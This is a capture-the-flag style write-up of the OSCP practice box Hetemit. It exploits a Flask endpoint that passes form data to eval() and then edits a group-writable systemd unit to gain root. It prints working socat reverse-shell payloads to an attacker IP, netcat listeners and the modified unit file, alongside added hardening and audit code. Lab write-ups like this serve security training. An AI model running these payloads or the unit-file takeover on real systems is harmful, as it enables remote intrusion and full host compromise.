OSCP practice lab: Hetemit
Key points (Python code injection through eval() + privilege escalation through a writable systemd service file)
1. nmap scan
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.173.117 -sV -sC -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-10 05:52 EDT
Nmap scan report for 192.168.173.117
Host is up (0.24s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.45.250
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 b1:e2:9d:f1:f8:10:db:a5:aa:5a:22:94:e8:92:61:65 (RSA)
| 256 74:dd:fa:f2:51:dd:74:38:2b:b2:ec:82:e5:91:82:28 (ECDSA)
|_ 256 48:bc:9d:eb:bd:4d:ac:b3:0b:5d:67:da:56:54:2b:a0 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CentOS 提供的 Apache HTTP 服务器测试页 (Apache HTTP Server Test Page provided by CentOS)
|_http-server-header: Apache/2.4.37 (centos)
| http-methods:
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
18000/tcp open biimenu?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| GetRequest, HTTPOptions:
| HTTP/1.0 403 Forbidden
| Content-Type: text/html; charset=UTF-8
| Content-Length: 3102
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8" />
| <title>Action Controller: Exception caught</title>
| <style>
| body {
| background-color: #FAFAFA;
| color: #333;
| margin: 0px;
| body, p, ol, ul, td {
| font-family: helvetica, verdana, arial, sans-serif;
| font-size: 13px;
| line-height: 18px;
| font-size: 11px;
| white-space: pre-wrap;
| pre.box {
| border: 1px solid #EEE;
| padding: 10px;
| margin: 0px;
| width: 958px;
| header {
| color: #F0F0F0;
| background: #C52F24;
| padding: 0.5em 1.5em;
| margin: 0.2em 0;
| line-height: 1.1em;
| font-size: 2em;
| color: #C52F24;
| line-height: 25px;
| .details {
|_ bord
50000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.8)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/1.0.1 Python/3.6.8
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at
Service Info: OS: Unix
Host script results:
| smb2-time:
| date: 2024-04-10T09:53:25
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.98 seconds
2. User shell
##
http://192.168.173.117:50000/verify
## POST method: the code parameter goes straight into eval(), so it runs arbitrary Python. The braces turn the payload into a set literal, i.e. one valid expression, and the app has already imported os, so os.system() resolves inside eval():
######
## Reverse shell (sent as the form body with Burp):
code={os.system('socat TCP:192.168.45.250:80 EXEC:/bin/sh')}
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 80
listening on [any] 80 ...
192.168.173.117: inverse host lookup failed: Unknown host
connect to [192.168.45.250] from (UNKNOWN) [192.168.173.117] 52086
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("bash")'
[cmeeks@hetemit restjson_hetemit]$ ^Z
zsh: suspended nc -lvvp 80
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo;fg
[1] + continued nc -lvvp 80
[cmeeks@hetemit restjson_hetemit]$ whoami
cmeeks
[cmeeks@hetemit restjson_hetemit]$
##################
## Look at the original source:
[cmeeks@hetemit restjson_hetemit]$ ls
app.py __pycache__
[cmeeks@hetemit restjson_hetemit]$ cat app.py
from flask import Flask, request
import hashlib, os   # os at module scope is what makes os.system() reachable from eval()
app = Flask(__name__)
@app.route('/')
def f0():
    return "{'/generate', '/verify'}"
@app.route('/generate', methods=['GET','POST'])
def f1():
    if request.method == 'GET':
        return "{'email@domain'}"
    else:
        email = request.form['email'].encode('utf-8')
        return hashlib.sha256(email).hexdigest()
@app.route('/verify', methods=['GET','POST'])
def f2():
    if request.method == 'GET':
        return "{'code'}"
    else:
        code = request.form['code']
        result = eval(code)   # attacker-controlled string evaluated as Python: arbitrary code execution
        return str(result)
if __name__ == '__main__':
    app.run()
[cmeeks@hetemit restjson_hetemit]$
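To see why the braces in the payload work and what the fix looks like, here is an added example; it is not part of the original writeup or of app.py. It models the POST branch of /verify as plain functions so it runs offline without Flask, builds the same kind of payload (using subprocess.check_output instead of os.system, so the command's stdout comes back in the response instead of only an exit status), and puts a hardened handler beside it. The function names, the use of ast.literal_eval, and the sample command are assumptions, not anything from the box.

```python
import ast
import os  # app.py imports os too, which is why `os.system` resolves inside eval()
import subprocess
import sys
from urllib.parse import parse_qs, urlencode


def build_payload(argv):
    """Return the form body Burp would send: a set literal wrapping a call.

    eval() needs a single expression; `{...}` is a set literal, so the whole
    string parses, and the call inside runs when the set is built. The
    writeup's os.system() variant only returns the exit status in the HTTP
    response; check_output() returns the command's stdout instead.
    """
    expr = "{__import__('subprocess').check_output(%r).decode().strip()}" % (list(argv),)
    return urlencode({"code": expr})


def verify_vulnerable(body):
    """Model of app.py's /verify POST branch: eval() on the `code` field."""
    form = parse_qs(body)
    code = form["code"][0]
    result = eval(code)  # the sink: attacker-controlled expression
    return str(result)


def verify_hardened(body):
    """Same endpoint with the sink removed.

    Assumption (not from app.py): `code` is meant to be a literal value, so
    it is parsed with ast.literal_eval, which never resolves names, attribute
    access or calls; anything else is rejected instead of evaluated.
    """
    form = parse_qs(body)
    code = form.get("code", [""])[0]
    try:
        value = ast.literal_eval(code)
    except (ValueError, SyntaxError):
        return "rejected"
    return str(value)


def demo():
    """Run the same payload through both handlers and return both results."""
    # Constructed command that works wherever Python runs, in place of socat
    argv = [sys.executable, "-c", "print('code ran under eval')"]
    body = build_payload(argv)
    return verify_vulnerable(body), verify_hardened(body)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable handler returned:", vulnerable)
    print("hardened handler returned:  ", hardened)
```

The vulnerable handler returns the set containing the command output, exactly the `str(result)` a real /verify would send back; the hardened one answers "rejected" because literal_eval refuses the `__import__(...)` call. The real fix is simply never to eval() request data; literal_eval is shown only for the case where /verify genuinely needs to parse a literal.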
3. Root privilege escalation
##
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
Group cmeeks:
/etc/systemd/system/pythonapp.service
/var/tmp/dnf-cmeeks-ajfswzl1/dnf.librepo.log
/var/tmp/dnf-cmeeks-ajfswzl1/expired_repos.json
/var/tmp/dnf-cmeeks-ajfswzl1/hawkey.log
/tmp/linpeas.sh
#############
## Privilege escalation via a writable service file:
https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation
##
[cmeeks@hetemit restjson_hetemit]$ cat exploit.sh
#!/bin/bash
socat TCP:192.168.45.250:18000 EXEC:sh
[cmeeks@hetemit restjson_hetemit]$ chmod +x exploit.sh
[cmeeks@hetemit restjson_hetemit]$ pwd
/home/cmeeks/restjson_hetemit
Before (the unit as found, group-writable by cmeeks):
[cmeeks@hetemit restjson_hetemit]$ cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=cmeeks
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
After (ExecStart pointed at exploit.sh, User set to root, and an [Install] section added):
[cmeeks@hetemit restjson_hetemit]$ cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
ExecStart=/home/cmeeks/restjson_hetemit/exploit.sh
TimeoutSec=30
RestartSec=15s
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target
[cmeeks@hetemit restjson_hetemit]$ sudo reboot
####################
## After the reboot the service starts as root and the root reverse shell comes back. Editing the unit changes nothing until systemd reloads it and the service is restarted; both normally need root, hence the sudo reboot above.
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 18000
listening on [any] 18000 ...
192.168.173.117: inverse host lookup failed: Unknown host
connect to [192.168.45.250] from (UNKNOWN) [192.168.173.117] 37110
id
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty;pty.spawn("bash")'
[root@hetemit /]# ^Z
zsh: suspended nc -lvvp 18000
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo;fg
[1] + continued nc -lvvp 18000
[root@hetemit /]# whoami
root
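The same check linpeas ran above, as an added example that is not from the original writeup: a small POSIX sh audit that lists service units, reports the user they run as (systemd defaults to root when User= is absent), the executable ExecStart launches, and whether the current user can edit either the unit file or that executable. It assumes sh with find, grep, sed, awk and mktemp; the demo writes a constructed copy of the writeup's pythonapp.service to a temp directory instead of touching /etc/systemd/system.

```sh
#!/bin/sh
# Added example (not from the original writeup): audit systemd unit files for
# the weakness exploited above. Assumes POSIX sh with find, grep, sed, awk, mktemp.

# unit_user FILE: value of the last User= line (systemd runs as root when unset)
unit_user() {
    u=$(grep '^User=' "$1" | tail -n 1 | cut -d= -f2-)
    if [ -n "$u" ]; then printf '%s\n' "$u"; else printf 'root\n'; fi
}

# unit_exec FILE: executable named by the last ExecStart= line, with systemd's
# prefix characters (-, @, :, +, !) stripped off
unit_exec() {
    grep '^ExecStart=' "$1" | tail -n 1 | cut -d= -f2- \
        | sed 's/^[-@:+!]*//' | awk '{print $1}'
}

# unit_risk FILE: classify one unit from the current user's point of view
#   WRITABLE_UNIT  the unit file itself can be edited (User=, ExecStart=)
#   WRITABLE_EXEC  the unit is fine but the program it launches can be replaced
#   OK             neither
unit_risk() {
    f=$1
    if [ -w "$f" ]; then
        printf 'WRITABLE_UNIT\n'
        return
    fi
    exe=$(unit_exec "$f")
    case $exe in
        /*) if [ -w "$exe" ]; then printf 'WRITABLE_EXEC\n'; return; fi ;;
    esac
    printf 'OK\n'
}

# audit_units DIR: one line per service unit: risk, effective user, executable, path
audit_units() {
    find "$1" -name '*.service' -type f 2>/dev/null | while read -r f; do
        printf '%s %s %s %s\n' "$(unit_risk "$f")" "$(unit_user "$f")" "$(unit_exec "$f")" "$f"
    done
}

# demo: constructed copy of the unit as the writeup found it, group/world-writable
# as linpeas reported, written to a temp dir and classified
demo() {
    d=$(mktemp -d)
    cat > "$d/pythonapp.service" <<'EOF'
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
User=cmeeks
Restart=on-failure
EOF
    chmod 664 "$d/pythonapp.service"
    audit_units "$d"
    rm -rf "$d"
}

# Usage on a live host: audit_units /etc/systemd/system | grep -v '^OK'
[ "${AUDIT_DEMO:-1}" = 1 ] && demo
```

On the box the interesting output line would be the one starting with WRITABLE_UNIT: the unit runs as cmeeks today, but because the file is writable the User= and ExecStart= lines are attacker-controlled, which is exactly what the writeup changes. For defenders the corrected state is the boring one: unit files 644 root:root, and ExecStart pointing at a root-owned path, so neither column is writable.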
4. Summary:
##
##
https://al1z4deh.medium.com/proving-grounds-hetemit-8469d0a3f189
## Python payload reference (HackTricks lists these under SSTI; the sink here is a plain eval(), not a template engine):
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#python